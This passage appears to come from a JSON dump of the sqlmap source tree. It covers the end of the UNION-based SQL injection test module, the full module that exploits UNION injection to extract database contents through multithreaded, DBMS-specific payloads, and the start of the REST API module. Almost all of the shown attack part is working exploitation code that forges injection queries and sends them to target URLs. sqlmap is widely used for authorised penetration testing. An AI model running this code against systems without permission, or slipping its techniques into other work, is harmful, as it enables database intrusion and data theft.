else None), payload, True) or \"\")).lower()\n\n            if content and phrase in content:\n                validPayload = payload\n                kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1\n                vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate)\n\n                if where == PAYLOAD.WHERE.ORIGINAL:\n                    # Prepare expression with delimiters\n                    randQuery2 = randomStr(charCount)\n                    phrase2 = (\"%s%s%s\" % (kb.chars.start, randQuery2, kb.chars.stop)).lower()\n                    randQueryProcessed2 = agent.concatQuery(\"\\'%s\\'\" % randQuery2)\n                    randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)\n\n                    # Confirm that it is a full union SQL injection\n                    query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)\n                    payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)\n\n                    # Perform the request\n                    page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)\n                    content = (\"%s%s\" % (page or \"\", listToStrValue(headers.headers if headers else None) or \"\")).lower()\n\n                    if not all(_ in content for _ in (phrase, phrase2)):\n                        vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)\n                    elif not kb.unionDuplicates:\n                        fromTable = \" FROM (%s) AS %s\" % (\" UNION \".join(\"SELECT %d%s%s\" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), \"\"), \" AS %s\" % randomStr() if _ == 0 else \"\") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())\n\n                        # Check for limited row output\n                        query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)\n                        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)\n\n                        # Perform the request\n                        page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)\n                        content = (\"%s%s\" % (removeReflectiveValues(page, payload) or \"\", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or \"\")).lower()\n                        if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:\n                            warnMsg = \"output with limited number of rows detected. Switching to partial mode\"\n                            logger.warning(warnMsg)\n                            vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)\n\n                unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()\n\n                if unionErrorCase and count > 1:\n                    warnMsg = \"combined UNION/error-based SQL injection case found on \"\n                    warnMsg += \"column %d. sqlmap will try to find another \" % (position + 1)\n                    warnMsg += \"column with better characteristics\"\n                    logger.warning(warnMsg)\n                else:\n                    break\n\n    return validPayload, vector\n\ndef _unionConfirm(comment, place, parameter, prefix, suffix, count):\n    validPayload = None\n    vector = None\n\n    # Confirm the union SQL injection and get the exact column\n    # position which can be used to extract data\n    validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)\n\n    # Assure that the above function found the exploitable full union\n    # SQL injection position\n    if not validPayload:\n        validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)\n\n    return validPayload, vector\n\ndef _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):\n    \"\"\"\n    This method tests if the target URL is affected by an union\n    SQL injection vulnerability. The test is done up to 50 columns\n    on the target database table\n    \"\"\"\n\n    validPayload = None\n    vector = None\n    orderBy = kb.orderByColumns\n    uChars = (conf.uChar, kb.uChar)\n    where = PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE\n\n    # In case that user explicitly stated number of columns affected\n    if conf.uColsStop == conf.uColsStart:\n        count = conf.uColsStart\n    else:\n        count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where)\n\n    if count:\n        validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)\n\n        if not all((validPayload, vector)) and not all((conf.uChar, conf.dbms, kb.unionTemplate)):\n            if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS:\n                if kb.fuzzUnionTest is None:\n                    msg = \"do you want to (re)try to find proper \"\n                    msg += \"UNION column types with fuzzy test? [y/N] \"\n\n                    kb.fuzzUnionTest = readInput(msg, default='N', boolean=True)\n                    if kb.fuzzUnionTest:\n                        kb.unionTemplate = _fuzzUnionCols(place, parameter, prefix, suffix)\n\n            warnMsg = \"if UNION based SQL injection is not detected, \"\n            warnMsg += \"please consider \"\n\n            if not conf.uChar and count > 1 and kb.uChar == NULL:\n                message = \"injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] \"\n\n                if not readInput(message, default='Y', boolean=True):\n                    warnMsg += \"usage of option '--union-char' \"\n                    warnMsg += \"(e.g. '--union-char=1') \"\n                else:\n                    conf.uChar = kb.uChar = str(randomInt(2))\n                    validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)\n\n            if not conf.dbms:\n                if not conf.uChar:\n                    warnMsg += \"and/or try to force the \"\n                else:\n                    warnMsg += \"forcing the \"\n                warnMsg += \"back-end DBMS (e.g. '--dbms=mysql') \"\n\n            if not all((validPayload, vector)) and not warnMsg.endswith(\"consider \"):\n                singleTimeWarnMessage(warnMsg)\n\n        if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)):  # discard ORDER BY results (not usable - e.g. maybe invalid altogether)\n            conf.uChar, kb.uChar = uChars\n            validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)\n\n    return validPayload, vector\n\n@stackedmethod\ndef unionTest(comment, place, parameter, value, prefix, suffix):\n    \"\"\"\n    This method tests if the target URL is affected by an union\n    SQL injection vulnerability. The test is done up to 3*50 times\n    \"\"\"\n\n    if conf.direct:\n        return\n\n    negativeLogic = kb.negativeLogic\n    setTechnique(PAYLOAD.TECHNIQUE.UNION)\n\n    try:\n        if negativeLogic:\n            pushValue(kb.negativeLogic)\n            pushValue(conf.string)\n            pushValue(conf.code)\n\n            kb.negativeLogic = False\n            conf.string = conf.code = None\n\n        validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)\n    finally:\n        if negativeLogic:\n            conf.code = popValue()\n            conf.string = popValue()\n            kb.negativeLogic = popValue()\n\n    if validPayload:\n        validPayload = agent.removePayloadDelimiters(validPayload)\n\n    return validPayload, vector\n"
  },
  {
    "path": "sqlmap/lib/techniques/union/use.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport json\nimport re\nimport time\n\nfrom lib.core.agent import agent\nfrom lib.core.bigarray import BigArray\nfrom lib.core.common import arrayizeValue\nfrom lib.core.common import Backend\nfrom lib.core.common import calculateDeltaSeconds\nfrom lib.core.common import clearConsoleLine\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import firstNotNone\nfrom lib.core.common import flattenValue\nfrom lib.core.common import getConsoleWidth\nfrom lib.core.common import getPartRun\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import incrementCounter\nfrom lib.core.common import initTechnique\nfrom lib.core.common import isDigit\nfrom lib.core.common import isListLike\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import listToStrValue\nfrom lib.core.common import parseUnionPage\nfrom lib.core.common import removeReflectiveValues\nfrom lib.core.common import singleTimeDebugMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import wasLastResponseDBMSError\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.convert import htmlUnescape\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.dicts import FROM_DUMMY_TABLE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapSyntaxException\nfrom lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH\nfrom lib.core.settings import NULL\nfrom lib.core.settings import SQL_SCALAR_REGEX\nfrom lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.core.threads import runThreads\nfrom lib.core.unescaper import unescaper\nfrom lib.request.connect import Connect as Request\nfrom lib.utils.progress import ProgressBar\nfrom lib.utils.safe2bin import safecharencode\nfrom thirdparty import six\nfrom thirdparty.odict import OrderedDict\n\ndef _oneShotUnionUse(expression, unpack=True, limited=False):\n    retVal = hashDBRetrieve(\"%s%s\" % (conf.hexConvert or False, expression), checkConf=True)  # as UNION data is stored raw unconverted\n\n    threadData = getCurrentThreadData()\n    threadData.resumed = retVal is not None\n\n    if retVal is None:\n        vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector\n\n        if not kb.jsonAggMode:\n            injExpression = unescaper.escape(agent.concatQuery(expression, unpack))\n            kb.unionDuplicates = vector[7]\n            kb.forcePartialUnion = vector[8]\n\n            # Note: introduced columns in 1.4.2.42#dev\n            try:\n                kb.tableFrom = vector[9]\n                kb.unionTemplate = vector[10]\n            except IndexError:\n                pass\n\n            query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)\n            where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]\n        else:\n            injExpression = unescaper.escape(expression)\n            where = vector[6]\n            query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False)\n\n        payload = agent.payload(newValue=query, where=where)\n\n        # Perform the request\n        page, headers, _ = Request.queryPage(payload, content=True, raise404=False)\n\n        if page and kb.chars.start.upper() in page and kb.chars.start not in page:\n            singleTimeWarnMessage(\"results seems to be upper-cased by force. sqlmap will automatically lower-case them\")\n\n            page = page.lower()\n\n        incrementCounter(PAYLOAD.TECHNIQUE.UNION)\n\n        if kb.jsonAggMode:\n            for _page in (page or \"\", (page or \"\").replace('\\\\\"', '\"')):\n                if Backend.isDbms(DBMS.MSSQL):\n                    output = extractRegexResult(r\"%s(?P<result>.*)%s\" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))\n                    if output:\n                        try:\n                            retVal = \"\"\n                            fields = re.findall(r'\"([^\"]+)\":', extractRegexResult(r\"{(?P<result>[^}]+)}\", output))\n                            for row in json.loads(output):\n                                retVal += \"%s%s%s\" % (kb.chars.start, kb.chars.delimiter.join(getUnicode(row[field] or NULL) for field in fields), kb.chars.stop)\n                        except:\n                            retVal = None\n                        else:\n                            retVal = getUnicode(retVal)\n                elif Backend.isDbms(DBMS.PGSQL):\n                    output = extractRegexResult(r\"(?P<result>%s.*%s)\" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))\n                    if output:\n                        retVal = output\n                else:\n                    output = extractRegexResult(r\"%s(?P<result>.*?)%s\" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))\n                    if output:\n                        try:\n                            retVal = \"\"\n                            for row in json.loads(output):\n                                retVal += \"%s%s%s\" % (kb.chars.start, row, kb.chars.stop)\n                        except:\n                            retVal = None\n                        else:\n                            retVal = getUnicode(retVal)\n\n                if retVal:\n                    break\n        else:\n            # Parse the returned page to get the exact UNION-based\n            # SQL injection output\n            def _(regex):\n                return firstNotNone(\n                    extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE),\n                    extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)\n                )\n\n            # Automatically patching last char trimming cases\n            if kb.chars.stop not in (page or \"\") and kb.chars.stop[:-1] in (page or \"\"):\n                warnMsg = \"automatically patching output having last char trimmed\"\n                singleTimeWarnMessage(warnMsg)\n                page = page.replace(kb.chars.stop[:-1], kb.chars.stop)\n\n            retVal = _(\"(?P<result>%s.*%s)\" % (kb.chars.start, kb.chars.stop))\n\n        if retVal is not None:\n            retVal = getUnicode(retVal, kb.pageEncoding)\n\n            # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection\n            if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError():\n                retVal = htmlUnescape(retVal).replace(\"<br>\", \"\\n\")\n\n            hashDBWrite(\"%s%s\" % (conf.hexConvert or False, expression), retVal)\n\n        elif not kb.jsonAggMode:\n            trimmed = _(\"%s(?P<result>.*?)<\" % (kb.chars.start))\n\n            if trimmed:\n                warnMsg = \"possible server trimmed output detected \"\n                warnMsg += \"(probably due to its length and/or content): \"\n                warnMsg += safecharencode(trimmed)\n                logger.warning(warnMsg)\n\n            elif re.search(r\"ORDER BY [^ ]+\\Z\", expression):\n                debugMsg = \"retrying failed SQL query without the ORDER BY clause\"\n                singleTimeDebugMessage(debugMsg)\n\n                expression = re.sub(r\"\\s*ORDER BY [^ ]+\\Z\", \"\", expression)\n                retVal = _oneShotUnionUse(expression, unpack, limited)\n\n            elif kb.nchar and re.search(r\" AS N(CHAR|VARCHAR)\", agent.nullAndCastField(expression)):\n                debugMsg = \"turning off NATIONAL CHARACTER casting\"  # NOTE: in some cases there are \"known\" incompatibilities between original columns and NCHAR (e.g. http://testphp.vulnweb.com/artists.php?artist=1)\n                singleTimeDebugMessage(debugMsg)\n\n                kb.nchar = False\n                retVal = _oneShotUnionUse(expression, unpack, limited)\n    else:\n        vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector\n        kb.unionDuplicates = vector[7]\n\n    return retVal\n\ndef configUnion(char=None, columns=None):\n    def _configUnionChar(char):\n        if not isinstance(char, six.string_types):\n            return\n\n        kb.uChar = char\n\n        if conf.uChar is not None:\n            kb.uChar = char.replace(\"[CHAR]\", conf.uChar if isDigit(conf.uChar) else \"'%s'\" % conf.uChar.strip(\"'\"))\n\n    def _configUnionCols(columns):\n        if not isinstance(columns, six.string_types):\n            return\n\n        columns = columns.replace(' ', \"\")\n        if '-' in columns:\n            colsStart, colsStop = columns.split('-')\n        else:\n            colsStart, colsStop = columns, columns\n\n        if not isDigit(colsStart) or not isDigit(colsStop):\n            raise SqlmapSyntaxException(\"--union-cols must be a range of integers\")\n\n        conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop)\n\n        if conf.uColsStart > conf.uColsStop:\n            errMsg = \"--union-cols range has to represent lower to \"\n            errMsg += \"higher number of columns\"\n            raise SqlmapSyntaxException(errMsg)\n\n    _configUnionChar(char)\n    _configUnionCols(conf.uCols or columns)\n\ndef unionUse(expression, unpack=True, dump=False):\n    \"\"\"\n    This function tests for an UNION SQL injection on the target\n    URL then call its subsidiary function to effectively perform an\n    UNION SQL injection on the affected URL\n    \"\"\"\n\n    initTechnique(PAYLOAD.TECHNIQUE.UNION)\n\n    abortedFlag = False\n    count = None\n    origExpr = expression\n    startLimit = 0\n    stopLimit = None\n    value = None\n\n    width = getConsoleWidth()\n    start = time.time()\n\n    _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr)\n\n    # Set kb.partRun in case the engine is called from the API\n    kb.partRun = getPartRun(alias=False) if conf.api else None\n\n    if expressionFieldsList and len(expressionFieldsList) > 1 and \"ORDER BY\" in expression.upper():\n        # Removed ORDER BY clause because UNION does not play well with it\n        expression = re.sub(r\"(?i)\\s*ORDER BY\\s+[\\w,]+\", \"\", expression)\n        debugMsg = \"stripping ORDER BY clause from statement because \"\n        debugMsg += \"it does not play well with UNION query SQL injection\"\n        singleTimeDebugMessage(debugMsg)\n\n    if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial)):\n        match = re.search(r\"SELECT\\s*(.+?)\\bFROM\", expression, re.I)\n        if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r\"\\b(MIN|MAX|COUNT)\\(\", expression):\n            kb.jsonAggMode = True\n            if Backend.isDbms(DBMS.MYSQL):\n                query = expression.replace(expressionFields, \"CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')\" % (kb.chars.start, kb.chars.delimiter, expressionFields, kb.chars.stop), 1)\n            elif Backend.isDbms(DBMS.ORACLE):\n                query = expression.replace(expressionFields, \"'%s'||JSON_ARRAYAGG(%s)||'%s'\" % (kb.chars.start, (\"||'%s'||\" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1)\n            elif Backend.isDbms(DBMS.SQLITE):\n                query = expression.replace(expressionFields, \"'%s'||JSON_GROUP_ARRAY(%s)||'%s'\" % (kb.chars.start, (\"||'%s'||\" % kb.chars.delimiter).join(\"COALESCE(%s,' ')\" % field for field in expressionFieldsList), kb.chars.stop), 1)\n            elif Backend.isDbms(DBMS.PGSQL):    # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item\n                query = expression.replace(expressionFields, \"ARRAY_AGG('%s'||%s||'%s')::text\" % (kb.chars.start, (\"||'%s'||\" % kb.chars.delimiter).join(\"COALESCE(%s::text,' ')\" % field for field in expressionFieldsList), kb.chars.stop), 1)\n            elif Backend.isDbms(DBMS.MSSQL):\n                query = \"'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'\" % (kb.chars.start, expression, kb.chars.stop)\n            output = _oneShotUnionUse(query, False)\n            value = parseUnionPage(output)\n            kb.jsonAggMode = False\n\n    # We have to check if the SQL query might return multiple entries\n    # if the technique is partial UNION query and in such case forge the\n    # SQL limiting the query output one entry at a time\n    # NOTE: we assume that only queries that get data from a table can\n    # return multiple entries\n    if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or conf.forcePartial or (dump and (conf.limitStart or conf.limitStop)) or \"LIMIT \" in expression.upper()) and \" FROM \" in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):\n        expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)\n\n        if limitCond:\n            # Count the number of SQL query entries output\n            countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)\n\n            if \" ORDER BY \" in countedExpression.upper():\n                _ = countedExpression.upper().rindex(\" ORDER BY \")\n                countedExpression = countedExpression[:_]\n\n            output = _oneShotUnionUse(countedExpression, unpack)\n            count = unArrayizeValue(parseUnionPage(output))\n\n            if isNumPosStrValue(count):\n                if isinstance(stopLimit, int) and stopLimit > 0:\n                    stopLimit = min(int(count), int(stopLimit))\n                else:\n                    stopLimit = int(count)\n\n                    debugMsg = \"used SQL query returns \"\n                    debugMsg += \"%d %s\" % (stopLimit, \"entries\" if stopLimit > 1 else \"entry\")\n                    logger.debug(debugMsg)\n\n            elif count and (not isinstance(count, six.string_types) or not count.isdigit()):\n                warnMsg = \"it was not possible to count the number \"\n                warnMsg += \"of entries for the SQL query provided. \"\n                warnMsg += \"sqlmap will assume that it returns only \"\n                warnMsg += \"one entry\"\n                logger.warning(warnMsg)\n\n                stopLimit = 1\n\n            elif (not count or int(count) == 0):\n                if not count:\n                    warnMsg = \"the SQL query provided does not \"\n                    warnMsg += \"return any output\"\n                    logger.warning(warnMsg)\n                else:\n                    value = []  # for empty tables\n                return value\n\n            if isNumPosStrValue(count) and int(count) > 1:\n                threadData = getCurrentThreadData()\n\n                try:\n                    threadData.shared.limits = iter(xrange(startLimit, stopLimit))\n                except OverflowError:\n                    errMsg = \"boundary limits (%d,%d) are too large. Please rerun \" % (startLimit, stopLimit)\n                    errMsg += \"with switch '--fresh-queries'\"\n                    raise SqlmapDataException(errMsg)\n\n                numThreads = min(conf.threads, (stopLimit - startLimit))\n                threadData.shared.value = BigArray()\n                threadData.shared.buffered = []\n                threadData.shared.counter = 0\n                threadData.shared.lastFlushed = startLimit - 1\n                threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1\n\n                if threadData.shared.showEta:\n                    threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))\n\n                if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:\n                    kb.suppressResumeInfo = True\n                    debugMsg = \"suppressing possible resume console info for \"\n                    debugMsg += \"large number of rows as it might take too long\"\n                    logger.debug(debugMsg)\n\n                try:\n                    def unionThread():\n                        threadData = getCurrentThreadData()\n\n                        while kb.threadContinue:\n                            with kb.locks.limit:\n                                try:\n                                    threadData.shared.counter += 1\n                                    num = next(threadData.shared.limits)\n                                except StopIteration:\n                                    break\n\n                            if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):\n                                field = expressionFieldsList[0]\n                            elif Backend.isDbms(DBMS.ORACLE):\n                                field = expressionFieldsList\n                            else:\n                                field = None\n\n                            limitedExpr = agent.limitQuery(num, expression, field)\n                            output = _oneShotUnionUse(limitedExpr, unpack, True)\n\n                            if not kb.threadContinue:\n                                break\n\n                            if output:\n                                with kb.locks.value:\n                                    if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):\n                                        items = parseUnionPage(output)\n\n                                        if threadData.shared.showEta:\n                                            threadData.shared.progress.progress(threadData.shared.counter)\n                                        if isListLike(items):\n                                            # in case that we requested N columns and we get M!=N then we have to filter a bit\n                                            if len(items) > 1 and len(expressionFieldsList) > 1:\n                                                items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]\n                                            items = [_ for _ in flattenValue(items)]\n                                            if len(items) > len(expressionFieldsList):\n                                                filtered = OrderedDict()\n                                                for item in items:\n                                                    key = re.sub(r\"[^A-Za-z0-9]\", \"\", item).lower()\n                                                    if key not in filtered or re.search(r\"[^A-Za-z0-9]\", item):\n                                                        filtered[key] = item\n                                                items = list(six.itervalues(filtered))\n                                            items = [items]\n                                        index = None\n                                        for index in xrange(1 + len(threadData.shared.buffered)):\n                                            if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:\n                                                break\n                                        threadData.shared.buffered.insert(index or 0, (num, items))\n                                    else:\n                                        index = None\n                                        if threadData.shared.showEta:\n                                            threadData.shared.progress.progress(threadData.shared.counter)\n                                        for index in xrange(1 + len(threadData.shared.buffered)):\n                                            if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:\n                                                break\n                                        threadData.shared.buffered.insert(index or 0, (num, None))\n\n                                        items = output.replace(kb.chars.start, \"\").replace(kb.chars.stop, \"\").split(kb.chars.delimiter)\n\n                                    while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):\n                                        threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]\n                                        if not isNoneValue(_):\n                                            threadData.shared.value.extend(arrayizeValue(_))\n                                        del threadData.shared.buffered[0]\n\n                                if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta and not kb.bruteMode:\n                                    _ = ','.join(\"'%s'\" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items]))\n                                    status = \"[%s] [INFO] %s: %s\" % (time.strftime(\"%X\"), \"resumed\" if threadData.resumed else \"retrieved\", _ if kb.safeCharEncode else safecharencode(_))\n\n                                    if len(status) > width:\n                                        status = \"%s...\" % status[:width - 3]\n\n                                    dataToStdout(\"%s\\n\" % status)\n\n                    runThreads(numThreads, unionThread)\n\n                    if conf.verbose == 1:\n                        clearConsoleLine(True)\n\n                except KeyboardInterrupt:\n                    abortedFlag = True\n\n                    warnMsg = \"user aborted during enumeration. sqlmap \"\n                    warnMsg += \"will display partial output\"\n                    logger.warning(warnMsg)\n\n                finally:\n                    for _ in sorted(threadData.shared.buffered):\n                        if not isNoneValue(_[1]):\n                            threadData.shared.value.extend(arrayizeValue(_[1]))\n                    value = threadData.shared.value\n                    kb.suppressResumeInfo = False\n\n    if not value and not abortedFlag:\n        output = _oneShotUnionUse(expression, unpack)\n        value = parseUnionPage(output)\n\n    duration = calculateDeltaSeconds(start)\n\n    if not kb.bruteMode:\n        debugMsg = \"performed %d quer%s in %.2f seconds\" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], 'y' if kb.counters[PAYLOAD.TECHNIQUE.UNION] == 1 else \"ies\", duration)\n        logger.debug(debugMsg)\n\n    return value\n"
  },
  {
    "path": "sqlmap/lib/utils/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/utils/api.py",
    "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport contextlib\nimport logging\nimport os\nimport re\nimport shlex\nimport socket\nimport sqlite3\nimport sys\nimport tempfile\nimport time\n\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import openFile\nfrom lib.core.common import saveConfig\nfrom lib.core.common import setColor\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.compat import xrange\nfrom lib.core.convert import decodeBase64\nfrom lib.core.convert import dejsonize\nfrom lib.core.convert import encodeBase64\nfrom lib.core.convert import encodeHex\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getText\nfrom lib.core.convert import jsonize\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.datatype import AttribDict\nfrom lib.core.defaults import _defaults\nfrom lib.core.dicts import PART_RUN_CONTENT_TYPES\nfrom lib.core.enums import AUTOCOMPLETE_TYPE\nfrom lib.core.enums import CONTENT_STATUS\nfrom lib.core.enums import MKSTEMP_PREFIX\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.log import LOGGER_HANDLER\nfrom lib.core.optiondict import optDict\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import RESTAPI_DEFAULT_ADAPTER\nfrom lib.core.settings import RESTAPI_DEFAULT_ADDRESS\nfrom lib.core.settings import RESTAPI_DEFAULT_PORT\nfrom lib.core.settings import RESTAPI_UNSUPPORTED_OPTIONS\nfrom lib.core.settings import VERSION_STRING\nfrom lib.core.shell import autoCompletion\nfrom lib.core.subprocessng import Popen\nfrom lib.parse.cmdline import cmdLineParser\nfrom thirdparty.bottle.bottle import error as return_error\nfrom thirdparty.bottle.bottle import get\nfrom thirdparty.bottle.bottle import hook\nfrom thirdparty.bottle.bottle import post\nfrom thirdparty.bottle.bottle import request\nfrom thirdparty.bottle.bottle import response\nfrom thirdparty.bottle.bottle import run\nfrom thirdparty.bottle.bottle import server_names\nfrom thirdparty import six\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import input as _input\nfrom thirdparty.six.moves import urllib as _urllib\n\n# Global data storage\nclass DataStore(object):\n    admin_token = \"\"\n    current_db = None\n    tasks = dict()\n    username = None\n    password = None\n\n# API objects\nclass Database(object):\n    filepath = None\n\n    def __init__(self, database=None):\n        self.database = self.filepath if database is None else database\n        self.connection = None\n        self.cursor = None\n\n    def connect(self, who=\"server\"):\n        self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False)\n        self.cursor = self.connection.cursor()\n        logger.debug(\"REST-JSON API %s connected to IPC database\" % who)\n\n    def disconnect(self):\n        if self.cursor:\n            self.cursor.close()\n\n        if self.connection:\n            self.connection.close()\n\n    def commit(self):\n        self.connection.commit()\n\n    def execute(self, statement, arguments=None):\n        while True:\n            try:\n                if arguments:\n                    self.cursor.execute(statement, arguments)\n                else:\n                    self.cursor.execute(statement)\n            except sqlite3.OperationalError as ex:\n                if \"locked\" not in getSafeExString(ex):\n                    raise\n            else:\n                break\n\n        if statement.lstrip().upper().startswith(\"SELECT\"):\n            return self.cursor.fetchall()\n\n    def init(self):\n        self.execute(\"CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)\")\n        self.execute(\"CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)\")\n        self.execute(\"CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)\")\n\nclass Task(object):\n    def __init__(self, taskid, remote_addr):\n        self.remote_addr = remote_addr\n        self.process = None\n        self.output_directory = None\n        self.options = None\n        self._original_options = None\n        self.initialize_options(taskid)\n\n    def initialize_options(self, taskid):\n        datatype = {\"boolean\": False, \"string\": None, \"integer\": None, \"float\": None}\n        self.options = AttribDict()\n\n        for _ in optDict:\n            for name, type_ in optDict[_].items():\n                type_ = unArrayizeValue(type_)\n                self.options[name] = _defaults.get(name, datatype[type_])\n\n        # Let sqlmap engine knows it is getting called by the API,\n        # the task ID and the file 